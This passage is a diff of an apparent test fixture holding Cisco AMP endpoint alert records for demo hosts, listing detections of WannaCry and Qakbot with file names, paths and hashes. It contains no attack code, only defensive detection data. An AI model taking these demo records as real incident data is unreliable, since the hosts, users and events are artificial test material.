Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "severity": 2 
@@ -1268,7 +1253,6 @@ ], "code": "1090519054", "id": "6419229327140848000", - "ingested": "2022-02-02T05:53:17.131259545Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 
@@ -1369,7 +1353,6 @@ ], "code": "1090519054", "id": "6419229327140848000", - "ingested": "2022-02-02T05:53:17.131260409Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 
@@ -1468,7 +1451,6 @@ ], "code": "1090519054", "id": "6419229322845880000", - "ingested": "2022-02-02T05:53:17.131261172Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 
@@ -1569,7 +1551,6 @@ ], "code": "2164260893", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131261932Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 3 
@@ -1645,7 +1626,6 @@ ], "code": "2164260893", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131262685Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 3 
@@ -1717,7 +1697,6 @@ ], "code": "553648155", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131263455Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 3 
@@ -1791,7 +1770,6 @@ ], "code": "553648147", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131264234Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 3 
@@ -1871,7 +1849,6 @@ ], "code": "553648147", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131264998Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 3 
@@ -1951,7 +1928,6 @@ ], "code": "553648147", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131265868Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "severity": 3 
@@ -2040,7 +2016,6 @@ ], "code": "1107296274", "id": "1493058569636000800", - "ingested": "2022-02-02T05:53:17.131266639Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}", "severity": 4, @@ -2120,7 +2095,6 @@ ], "code": "553648155", "id": "6264772016730014000", - "ingested": "2022-02-02T05:53:17.131267404Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "severity": 3 
@@ -2194,7 +2168,6 @@ ], "code": "553648147", "id": "6264772016730014000", - "ingested": "2022-02-02T05:53:17.131268158Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "severity": 3 
@@ -2278,7 +2251,6 @@ ], "code": "553648147", "id": "6264772012435046000", - "ingested": "2022-02-02T05:53:17.131268916Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "severity": 3 
@@ -2360,7 +2332,6 @@ ], "code": "2164260880", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131269670Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -2434,7 +2405,6 @@ ], "code": "1090519054", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131270433Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "severity": 2 
@@ -2528,7 +2498,6 @@ ], "code": "1090519054", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131271194Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 